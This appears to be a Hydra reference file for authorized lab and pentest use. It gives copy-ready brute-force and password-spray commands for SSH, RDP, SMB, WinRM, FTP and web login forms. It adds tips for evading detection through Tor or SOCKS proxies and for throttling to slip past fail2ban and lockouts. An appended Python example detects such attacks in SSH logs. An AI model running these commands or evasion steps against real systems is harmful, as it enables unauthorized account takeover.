name: hydra
description: "Auth/lab ref: Online brute-force and password spraying tool supporting 50+ protocols (SSH, HTTP, FTP, SMB, RDP, WinRM, and more)."
license: AGPL-3.0
compatibility: "Linux, Windows, macOS."
metadata:
  author: AeonDave
  version: "1.1"
Hydra
Fast, parallelized online password cracker for 50+ protocols.
Quick Start
```bash
# SSH brute-force
hydra -l admin -P passwords.txt ssh://192.168.1.10
# HTTP POST form
hydra -l admin -P passwords.txt 192.168.1.10 http-post-form "/login:user=^USER^&pass=^PASS^:Invalid"
# Multiple users + passwords
hydra -L users.txt -P passwords.txt ssh://192.168.1.10
```
Core Flags
| Flag | Description |
|---|---|
| `-l <user>` | Single username |
| `-L <file>` | Username list |
| `-p <pass>` | Single password |
| `-P <file>` | Password list |
| `-u` | Loop users before passwords (default: passwords first) |
| `-C <file>` | Colon-delimited user:pass list |
| `-t <n>` | Threads per host (default 16) |
| `-T <n>` | Total parallel targets |
| `-s <port>` | Custom port |
| `-S` | Use SSL/TLS |
| `-o <file>` | Output found credentials |
| `-f` | Stop after first valid pair (per host) |
| `-F` | Stop after first valid pair (all hosts) |
| `-v` | Verbose |
| `-V` | Very verbose (show each attempt) |
| `-d` | Debug |
| `-R` | Restore previous session |
| `-I` | Ignore existing restore file (start fresh) |
| `-e nsr` | Try: n=empty pass, s=user as pass, r=reversed user |
| `-w <sec>` | Wait time for server response (default 32s) |
| `-W <sec>` | Wait between connect attempts per thread (rate throttle) |
| `-x proto` | SOCKS5/HTTP proxy: `-x socks5://127.0.0.1:1080` |
Supported Modules (Common)
ssh, ftp, http-get, http-post-form, https-post-form, smb, rdp, winrm, imap, pop3, smtp, mysql, postgres, mssql, telnet, vnc, ldap2, redis
Common Workflows
```bash
# SSH with user list
hydra -L users.txt -P rockyou.txt ssh://10.10.10.10 -t 4
# HTTP form login
hydra -l admin -P passwords.txt 10.10.10.10 http-post-form \
  "/admin/login.php:username=^USER^&password=^PASS^:Wrong password"
# RDP brute-force
hydra -l administrator -P passwords.txt rdp://10.10.10.10
# FTP
hydra -l ftp -P passwords.txt ftp://10.10.10.10
# SMB password spray (single password, many users)
hydra -L users.txt -p "Summer2024!" smb://10.10.10.10
# WinRM
hydra -l administrator -P passwords.txt winrm://10.10.10.10
# Rate-limited (avoid lockouts)
hydra -l admin -P passwords.txt ssh://10.10.10.10 -t 1 -W 3
```
Proxy / Evasion
```bash
# Route through SOCKS5 (Tor or pivoting)
hydra -l admin -P passwords.txt -x socks5://127.0.0.1:1080 ssh://10.10.10.10
# HTTP proxy
hydra -l admin -P passwords.txt -x http://127.0.0.1:8080 http-post-form \
  "/login:user=^USER^&pass=^PASS^:Invalid"
```
Tips
- Use `-e nsr` for quick wins (null, same as user, reversed)
- Set `-t 1-4` for protocols with lockout policies (RDP, SMB, WinRM)
- `-W 3` adds 3s between connect attempts per thread; avoids fail2ban bans
- `-w` controls response timeout; increase for slow targets (e.g., `-w 10`)
- For HTTP forms: identify `failure_message` from the response body
- Use `-I` to ignore leftover restore files from previous interrupted runs
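
Seen from the defending side, the throttled and spraying runs described in the workflows and tips above still leave a signature in authentication logs. The following is an added example, not part of the original page or of Hydra: it counts failed OpenSSH logins per source in a sliding window and separates many-username spraying from single-account guessing. The log lines, thresholds and function names are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches OpenSSH lines like "... sshd[1]: Failed password for [invalid user] bob from IP port N ssh2"
FAIL = re.compile(r"^(\w{3} +\d+ [\d:]{8}) \S+ sshd\[\d+\]: Failed password for "
                  r"(?:invalid user )?(\S+) from (\S+) port \d+")

def parse(lines, year=2024):
    """Yield (timestamp, user, source_ip) for each failed SSH password attempt."""
    for line in lines:
        m = FAIL.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
            yield ts, m.group(2), m.group(3)

# Thresholds are illustrative assumptions, not recommended values.
def classify(lines, window=timedelta(minutes=10), max_fail=10, max_users=5):
    """Flag sources by failures and distinct usernames inside a sliding window."""
    by_ip = defaultdict(list)
    for ts, user, ip in parse(lines):
        by_ip[ip].append((ts, user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        start, worst_fail, worst_users = 0, 0, 0
        for end, (ts, _) in enumerate(events):
            while ts - events[start][0] > window:
                start += 1
            span = events[start:end + 1]
            worst_fail = max(worst_fail, len(span))
            worst_users = max(worst_users, len({u for _, u in span}))
        if worst_users >= max_users:
            verdicts[ip] = "spray"        # one source, many usernames
        elif worst_fail >= max_fail:
            verdicts[ip] = "brute-force"  # one source, many guesses at one account
    return verdicts

def sample_log():
    """Constructed log: throttled guessing, a spray, and one user's typos."""
    t0 = datetime(2024, 1, 10, 12, 0, 0)
    fmt = "{} host sshd[1]: Failed password for {} from {} port 4242 ssh2"
    stamp = lambda s: (t0 + timedelta(seconds=s)).strftime("%b %d %H:%M:%S")
    slow = [fmt.format(stamp(3 * i), "admin", "198.51.100.7") for i in range(40)]
    spray = [fmt.format(stamp(60 * i), f"invalid user u{i}", "203.0.113.9") for i in range(8)]
    typo = [fmt.format(stamp(20 * i), "alice", "192.0.2.20") for i in range(3)]
    return slow + spray + typo
```

With a 10-second window the same constructed log yields no verdicts, because attempts spaced 3 seconds apart never accumulate. Window length, not only the failure count, decides whether throttled guessing is caught.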
Resources
| File | When to load |
|---|---|
| `references/protocols.md` | Module syntax for each protocol, POST form detection, HTTPS handling |